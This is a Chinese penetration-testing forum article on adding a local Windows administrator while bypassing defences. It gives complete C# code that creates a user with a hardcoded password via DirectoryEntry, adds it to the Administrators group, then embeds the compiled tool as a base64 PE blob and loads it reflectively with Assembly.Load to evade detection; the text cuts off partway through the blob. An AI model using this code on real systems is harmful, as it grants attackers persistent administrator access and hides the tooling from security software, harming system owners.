问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Bypass Add Local user
渗透测试
DirectoryEntry类 [System.ComponentModel.TypeConverter(typeof(System.DirectoryServices.Design.DirectoryEntryConverter))] [System.DirectoryServices.DSDescription("DirectoryE...
DirectoryEntry类 ```php [System.ComponentModel.TypeConverter(typeof(System.DirectoryServices.Design.DirectoryEntryConverter))] [System.DirectoryServices.DSDescription("DirectoryEntryDesc")] public class DirectoryEntry : System.ComponentModel.Component ``` 构造函数 ```php DirectoryEntry() 初始化 DirectoryEntry 类的新实例。 DirectoryEntry(Object) 初始化 DirectoryEntry 类的新实例,该类可绑定到指定的本机 Active Directory 域服务对象。 DirectoryEntry(String) 初始化 DirectoryEntry 类的新实例,该类将此实例绑定到位于指定路径的 Active Directory 域服务中的节点。 DirectoryEntry(String, String, String) 初始化 DirectoryEntry 类的新实例。 DirectoryEntry(String, String, String, AuthenticationTypes) 初始化 DirectoryEntry 类的新实例。 ``` 这个一般是用来连接ad的,比如操作ldap数据库,进行查询域内信息,委派啊等等。我们可以传递参数为`WinNT://hostname,computer`,创建一个新的条目。 c#可以通过如下两种方式查看本机hostname。 ```php using System.Net; string hostname = Dns.GetHostName(); Console.WriteLine(hostname); string hostname1 = Environment.MachineName; Console.WriteLine(hostname1); ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-c876e2076e3ab711aed18ade98348e89cabd5348.png) 然后我们添加一个值给user到ad中。 ```php string hostname = Dns.GetHostName(); DirectoryEntry DE = new DirectoryEntry("WinNT://" + hostname + ",computer"); string username = "testuseradd"; string password = "1qaz@WSX.."; DirectoryEntry user = DE.Children.Add(username, "user"); ``` 然后用DirectoryEntry类的Invoke方法调用SetPassword方法来添加密码。再通过CommitChanges()方法来进行保存刷新。 ```php user.Invoke("SetPassword", new object[] { password }); user.CommitChanges(); ``` ### 0x02 添加用户到管理员组 因为某些地区可能语言问题,管理员组名字不叫作administrator。所以我们可以先枚举一下目标本地组 ```php string hostname = Dns.GetHostName(); DirectoryEntry DE = new DirectoryEntry("WinNT://" + hostname + ",computer"); DirectoryEntry group; foreach(DirectoryEntry entry in DE.Children) { if (entry.SchemaClassName == "Group") { Console.WriteLine(entry.Name); } } ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-c5c7ccc31d5b7f56fb511600e56f41a5172ec3fd.png) 如何添加到管理员组? 首先定义一个`DirectoryEntry`类型的变量group。然后调用`DirectoryEntry`类的find方法找到`administrators`组,再通过Invoke添加上面创建的用户。 ```php DirectoryEntry group; group = DE.Children.Find("Administrators", "group"); if (group != null) { group.Invoke("Add", new object[] { user.Path.ToString() }); } ``` 完整代码 ```php using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.DirectoryServices; using System.Net; namespace AddUser { internal class Program { static void Main(string[] args) { string hostname = Dns.GetHostName(); DirectoryEntry DE = new DirectoryEntry("WinNT://" + hostname + ",computer"); if (args.Length == 1 && args[0] == "--list") { ListGroup(hostname,DE); } else if(args.Length == 6 && args[0] == "-u" && args[2] == "-p" && args[4] == "-l") { string username = args[1]; string password = args[3]; string groupname = args[5]; try { Add(username, password, DE); }catch(Exception e) { Console.WriteLine(e.Message); } } } public static void ListGroup(string hostname,DirectoryEntry DE) { hostname = Dns.GetHostName(); DE = new DirectoryEntry("WinNT://" + hostname + ",computer"); foreach (DirectoryEntry entry in DE.Children) { if (entry.SchemaClassName == "Group") { Console.WriteLine(entry.Name); } } } public static void Add(string username,string password, DirectoryEntry DE) { DirectoryEntry user = DE.Children.Add(username, "user"); user.Invoke("SetPassword", new object[] { password }); user.CommitChanges(); DirectoryEntry group; group = DE.Children.Find("Administrators", "group"); if (group != null) { group.Invoke("Add", new object[] { user.Path.ToString() }); } Console.WriteLine("[*] Account Created Successfully"); Console.WriteLine($"[+] Username: {username}\n[+] Password: {password}"); } } } ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-12a5eca5d0fdb08091645c53b5eda95563e19487.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-b8ea71931da7ac7e67e6bd65e929e242da7fab4f.png) ### 0x03 反射加载 首先在AddUser里面添加一个类,包含一下方法 ```php public class Test { public static void ListGroup(string hostname, DirectoryEntry DE) { hostname = Dns.GetHostName(); DE = new DirectoryEntry("WinNT://" + hostname + ",computer"); foreach (DirectoryEntry entry in DE.Children) { if (entry.SchemaClassName == "Group") { Console.WriteLine(entry.Name); } } } public static void Add(string username, string password, DirectoryEntry DE) { DirectoryEntry user = DE.Children.Add(username, "user"); user.Invoke("SetPassword", new object[] { password }); user.CommitChanges(); DirectoryEntry group; group = DE.Children.Find("Administrators", "group"); if (group != null) { group.Invoke("Add", new object[] { user.Path.ToString() }); } Console.WriteLine("[+]" + username + " Created Success"); Console.WriteLine("[+]" + username + " add to group Success"); } } ``` 先把exe转换为string ```php byte[] buffer = File.ReadAllBytes("AddUser.exe"); string base64str = Convert.ToBase64String(buffer); Console.WriteLine(base64str); ``` 结果为 ```php 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dEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQWRkVXNlci5leGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUb1N0cmluZwBnZXRfUGF0aABQcm9ncmFtAFN5c3RlbQBnZXRfQ2hpbGRyZW4ATWFpbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ATGlzdEdyb3VwAEFkZFVzZXIASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLkRpcmVjdG9yeVNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAENvbW1pdENoYW5nZXMARGlyZWN0b3J5RW50cmllcwBhcmdzAERucwBTeXN0ZW0uQ29sbGVjdGlvbnMAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AGdldF9DdXJyZW50AFRlc3QATW92ZU5leHQARGlyZWN0b3J5RW50cnkAb3BfRXF1YWxpdHkAAAARVwBpAG4ATgBUADoALwAvAAATLABjAG8AbQBwAHUAdABlAHIAAA0tAC0AbABpAHMAdAABBS0AdQABBS0AcAABC0cAcgBvAHUAcAAACXUAcwBlAHIAABdTAGUAdABQAGEAcwBzAHcAbwByAGQAAB1BAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAAAtnAHIAbwB1AHAAAAdBAGQAZAAAB1sAKwBdAAAhIABDAHIAZQBhAHQAZQBkACAAUwB1AGMAYwBlAHMAcwAAKyAAYQBkAGQAIAB0AG8AIABnAHIAbwB1AHAAIABTAHUAYwBjAGUAcwBzAAAAQ3REeVsMNk+j95CnDRvIGAAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBwcEDhJFDg4DAAAOBgADDg4ODgUAAgIODgMgAA4EAAEBDggHAxJNEkUSUQQgABJhBCAAEk0DIAAcAyAAAgYHAhJFEkUGIAISRQ4OBiACHA4dHAi3elxWGTTg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 ``` 在loader这边一样的获得机器名,和定义一个DirectoryEntry的变量 ```php string hostname = Dns.GetHostName(); DirectoryEntry DE = new DirectoryEntry("WinNT://" + hostname + ",computer"); ``` 把string转换为byte类型,通过load方法加载 ```php byte[] buffer = Convert.FromBase64String(base64str); Assembly assembly = Assembly.Load(buffer); ``` 获得ListGroup方法,并且传参调用 ```php Type type = assembly.GetType("AddUser.Test"); MethodInfo method = type.GetMethod("ListGroup"); Object obj = assembly.CreateInstance(method.Name); method.Invoke(obj, new object[] { hostname ,DE}); ``` ![image.png](https://shs3.b.qianxin.com/attack_forum/2022/08/attach-1f22f8c9af6d02b5376381bb88f56bc04b70e0b9.png) 同理添加用户。 ```php string hostname = Dns.GetHostName(); DirectoryEntry DE = new DirectoryEntry("WinNT://" + hostname + ",computer"); string base64str = "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